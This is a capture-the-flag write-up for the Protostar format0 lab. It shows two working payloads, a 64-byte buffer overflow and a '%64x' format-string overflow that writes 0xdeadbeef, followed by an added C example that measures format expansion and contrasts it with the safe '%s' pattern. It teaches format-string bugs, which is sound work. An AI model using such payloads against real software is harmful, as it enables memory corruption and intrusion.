Protostar vm, format0
Here is the source of the vulnerable program:
This challenge is about learning the basics of format strings attacks.
First off, note that this code is vulnerable to a simple buffer overflow, and we can use the same trick we used in stack1:
user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print 64*"A"+"\xef\xbe\xad\xde"'`
But that's not really why we're here; besides, the challenge's webpage tells us that we should use 10 bytes or less. So let's dig into format string attacks.
After some research, I found out that format identifiers can have a minimum field width. This means that you can actually reproduce the buffer overflow used above by padding the buffer with this trick:
user@protostar:~$ /opt/protostar/bin/./format0 `python -c 'print "%64x"+"\xef\xbe\xad\xde"'`
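The two commands above rely on the same fact: a 64-byte buffer receives more than 64 bytes, either as 64 literal characters or as a single `%64x` directive that the formatting function expands to 64 characters. The following C program is an added example (not part of the original writeup or of the Protostar sources) that measures that expansion without writing into any buffer, by using `snprintf(NULL, 0, ...)`, which only computes the length the output would have. It contrasts the unsafe pattern (user input used as the format string) with the corrected one (user input passed as a `%s` argument), and flags which inputs would overrun a 64-byte buffer, the size implied by the first command above. The buffer size, the function names and the sample inputs are assumptions made for this example.

```c
#include <stdio.h>
#include <stddef.h>

/* Assumed destination buffer size; the first command above overflows it with 64 "A"s. */
#define BUF_SIZE 64

/* Unsafe pattern, modelled safely: the caller-controlled string is the format string,
   so directives such as %64x are interpreted. snprintf with a NULL buffer and size 0
   returns the length the output WOULD have, so nothing is written anywhere. */
size_t expanded_length(const char *user_string) {
    int n = snprintf(NULL, 0, user_string, 0);
    return n < 0 ? 0 : (size_t)n;
}

/* Corrected pattern: the user string is an argument to a fixed "%s" format,
   so its contents are copied verbatim and never interpreted as directives. */
size_t literal_length(const char *user_string) {
    int n = snprintf(NULL, 0, "%s", user_string);
    return n < 0 ? 0 : (size_t)n;
}

/* Returns 1 if `produced` bytes plus the terminating NUL would not fit in BUF_SIZE. */
int would_overflow(size_t produced) {
    return produced + 1 > BUF_SIZE;
}

int main(void) {
    /* Constructed sample inputs: a harmless string, a 10-wide directive,
       and the 8-byte payload shape used in the second command above
       (a %64x directive followed by four arbitrary bytes). */
    const char *samples[] = { "hello", "%10x", "%64x\xef\xbe\xad\xde" };
    size_t count = sizeof samples / sizeof samples[0];

    for (size_t i = 0; i < count; i++) {
        size_t as_format = expanded_length(samples[i]);
        size_t as_arg = literal_length(samples[i]);
        printf("input %zu: as format -> %3zu bytes (%s), as %%s argument -> %3zu bytes (%s)\n",
               i, as_format, would_overflow(as_format) ? "OVERFLOW" : "fits",
               as_arg, would_overflow(as_arg) ? "OVERFLOW" : "fits");
    }
    return 0;
}
```

The third sample is only 8 bytes long on the command line, which is why it satisfies the challenge's 10-byte limit, yet as a format string it expands to 68 bytes and overruns the buffer; passed through `%s` it stays 8 bytes and fits. Any `printf`-family call whose format argument comes from outside the program should be rewritten in the second form.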